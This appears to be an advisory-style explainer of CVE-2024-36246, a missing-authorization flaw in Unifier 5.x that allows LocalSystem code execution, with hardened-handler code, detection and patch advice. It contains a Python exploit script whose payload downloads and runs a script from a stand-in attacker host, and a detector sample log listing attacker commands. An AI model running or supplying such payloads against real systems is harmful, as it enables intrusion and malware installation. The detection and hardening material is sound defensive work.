CVE-2024-36246 - Critical Missing Authorization in Unifier and Unifier Cast (5.x), Risk of LocalSystem Code Execution
A critical security vulnerability, CVE-2024-36246, has been identified in Unifier and Unifier Cast software version 5.x. Installations that have not applied patch 20240527 allow an attacker to execute arbitrary code with LocalSystem privilege. An attacker exploiting this flaw can install malicious programs, modify system files, or delete critical data outright.
This article gives a detailed, easy-to-understand breakdown of CVE-2024-36246, supported by code snippets, exploit insights, official references, and practical advice to keep your environment safe.
1. What Is CVE-2024-36246?
CVE-2024-36246 is a missing authorization vulnerability in Unifier and Unifier Cast 5.x. Some sensitive backend actions are reachable without any check of who is calling: a request to the affected endpoint triggers a privileged system function whether or not the caller has ever logged in.
An unauthenticated attacker who can reach the service can:
- Install programs of their choosing.
- Modify or wipe out your data.
This all happens under LocalSystem privileges (NT AUTHORITY\SYSTEM), the most privileged local account on Windows.
You are affected if:
- You run Unifier or Unifier Cast 5.x.
- You have not yet applied patch 20240527.
> Unifier/Unifier Cast are often used in automation, monitoring, and remote system management. They may be installed on desktops, servers, or cloud VMs—anywhere they manage jobs or scripts.
2. Vulnerable Endpoint
For the purposes of this article, call the affected backend endpoint /system/adminExec (a placeholder name; the real path is whatever your build exposes). The authorization check is simply missing: the handler never requires a valid session or token before dispatching the request, so anyone who can reach the port, with no password at all, can post data to it.
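To make the flaw concrete, the following added example (not code from Unifier or from the vendor) puts a handler with the missing-authorization pattern next to a hardened version of the same endpoint. The session table, token values, role names, action names and service name are all assumptions constructed for the example; the `execute` stand-in only records what would run instead of running it.

```python
import hashlib

# Constructed session table for this example: SHA-256 of the session
# token -> role. Only digests are stored, so a dump of this table does
# not yield usable tokens.
def _digest(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()

SESSIONS = {
    _digest("admin-token-7Qx"): "admin",
    _digest("viewer-token-2Pl"): "viewer",
}

# Allow-listed administrative actions. Each name maps to a fixed argv
# list; the caller picks an action name and never supplies a shell
# string. Service and binary names are assumptions for the example.
ALLOWED_ACTIONS = {
    "stop_agent": ["sc.exe", "stop", "UnifierAgent"],
    "rotate_logs": ["C:\\Program Files\\Unifier\\rotate_logs.exe"],
}

def execute(argv):
    """Stand-in for the privileged execution step. In the product this is
    where the command runs as LocalSystem; here it only records argv."""
    return {"status": 200, "executed": argv}

def vulnerable_admin_exec(request):
    """Missing-authorization pattern: straight from request body to
    privileged execution. Nothing identifies or checks the caller."""
    return execute(["cmd.exe", "/c", request["json"]["command"]])

def hardened_admin_exec(request):
    """Same endpoint with the checks the vulnerable version skips:
    authentication (valid session), authorization (admin role), and a
    fixed action allow-list instead of a free-form command string."""
    auth = request.get("headers", {}).get("Authorization", "")
    if not auth.startswith("Bearer "):
        return {"status": 401, "error": "missing session token"}
    # Lookup by digest: no raw-token equality comparison anywhere.
    role = SESSIONS.get(_digest(auth[len("Bearer "):]))
    if role is None:
        return {"status": 401, "error": "invalid session token"}
    if role != "admin":
        return {"status": 403, "error": "admin role required"}
    action = request.get("json", {}).get("action")
    argv = ALLOWED_ACTIONS.get(action)
    if argv is None:
        return {"status": 400, "error": "unknown action"}
    return execute(list(argv))

if __name__ == "__main__":
    anon = {"headers": {}, "json": {"command": "whoami"}}
    print("vulnerable:", vulnerable_admin_exec(anon))
    print("hardened:  ", hardened_admin_exec(anon))
```

The ordering matters: authenticate first, then authorize, then validate the action. Even with authentication restored, accepting an arbitrary command string from an admin session would still turn a stolen admin token into LocalSystem code execution, which is why the hardened handler only maps action names to fixed argv lists.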
3. Exploitation Steps
1. Locate a vulnerable server: attackers use internet scanners (like Shodan) to find exposed Unifier web ports.
2. Send a crafted POST request: the attacker sends a request whose body carries a command payload.
3. Server executes the payload: the service, running as LocalSystem, obediently runs the attacker's command.
Sample Exploit Code (Python)
Below is simplified code demonstrating how to exploit CVE-2024-36246. (For educational use only!) The host, port and endpoint path are placeholders.
```python
import requests

# Placeholder target: /system/adminExec stands in for the real
# unauthenticated handler, whose path this article does not know.
target = "http://victim-server:808/system/adminExec"

# No session cookie, no token: the request carries only the command.
data = {
    "command": "powershell -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://evil.com/malware.ps1\")'",
}

response = requests.post(target, json=data, timeout=10)
if response.status_code == 200:
    print("Exploit sent successfully. Check for malware installation.")
else:
    print(f"Failed: {response.status_code} - {response.content}")
```
This script tells the Unifier host—*with full LocalSystem rights*—to grab and run a script from the attacker's server.
4. Proof of Concept (PoC)
A working PoC need be no more complex than the script above: one unauthenticated POST. Once arbitrary commands run as LocalSystem, expect the usual follow-on activity, such as coin miners, ransomware, and hidden administrator accounts.
5. Detection
- Check the log in which Unifier records commands dispatched by the service for suspicious or unexpected executions. The path logs/system/adminExec.log and the line format below are illustrative; confirm the actual location against the vendor bulletin for your build.
Sample suspicious log line
```
2024-05-30 14:32:11 - Command executed: powershell.exe -c IEX (New-Object Net.WebClient)...
```
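The following added example (not code from the vendor or from the original article) runs that check over log lines in the format shown above. The log format is assumed from the sample line; the log content is constructed for the example, and the indicator patterns cover the follow-on activity discussed earlier (download cradles, in-memory execution, encoded PowerShell, account creation, scheduled-task persistence).

```python
import re
from datetime import datetime

# Assumed log format, following the sample line in the article:
#   YYYY-MM-DD HH:MM:SS - Command executed: <command line>
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) - Command executed: (?P<cmd>.+)$"
)

# (label, pattern) pairs; one command can trip several.
INDICATORS = [
    ("download cradle", re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|"
        r"certutil.*-urlcache|bitsadmin", re.I)),
    ("in-memory execution", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("encoded command", re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("account creation", re.compile(
        r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b", re.I)),
    ("scheduled-task persistence", re.compile(
        r"schtasks(?:\.exe)?\s+/create", re.I)),
]

def parse_line(line):
    """Return (timestamp, command) for a well-formed line, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
    return ts, m.group("cmd")

def scan(lines):
    """One finding per command that trips at least one indicator."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed or unrelated line, skipped
        ts, cmd = parsed
        reasons = [label for label, pat in INDICATORS if pat.search(cmd)]
        if reasons:
            findings.append({"ts": ts.isoformat(), "cmd": cmd, "reasons": reasons})
    return findings

# Constructed sample log for the example (not real data).
SAMPLE_LOG = r"""
2024-05-30 14:32:11 - Command executed: powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://evil.example/malware.ps1')
2024-05-30 14:35:02 - Command executed: net user svc_backup P@ss2024! /add
2024-05-30 14:35:40 - Command executed: schtasks /create /tn Updater /tr C:\ProgramData\upd.exe /sc minute /mo 5
2024-05-30 15:01:13 - Command executed: unifier-agent.exe --collect-metrics
2024-05-30 15:10:00 - Command executed: powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
garbage line that does not match the format
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], ", ".join(f["reasons"]), "::", f["cmd"])
```

Because the endpoint is unauthenticated, the log cannot tell you who issued a command; treat any execution you did not schedule as suspect, and use the indicator labels only to prioritise triage. Extend INDICATORS with whatever your own environment considers abnormal for this service.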
6. Official Patch
The vendor has released patch 20240527.
You must:
- Download the latest patch for Unifier or Unifier Cast from your vendor portal or https://www.unifier.com/security/cve-2024-36246 and apply it to every affected host.
- Limit network access to the service with firewalls (localhost only if possible) until the patch is in place.
- Regularly audit user accounts and authorized keys/scripts, since an attacker who already exploited the flaw may have added their own.
7. References
- JPCERT/CC Alert 2024-06-01: CVE-2024-36246
- Unifier Security Bulletin, May 2024
- CVE Details: CVE-2024-36246
8. Conclusion
CVE-2024-36246 is a critical missing authorization bug in Unifier and Unifier Cast 5.x, patched in May 2024.
If you are behind on updates, now is the time to install patch 20240527. The vulnerability lets an unauthenticated attacker run anything with the highest possible system rights.
Don’t wait—apply the fix, review your logs, and monitor tightly. History shows attackers are quick to abuse such critical bugs.
*Stay updated, stay protected!*
*Share this post with colleagues, IT admins, and cybersecurity teams to help stamp out this dangerous bug before it’s too late.*
Timeline
Published on: 05/31/2024 06:15:12 UTC
Last modified on: 08/15/2024 17:35:07 UTC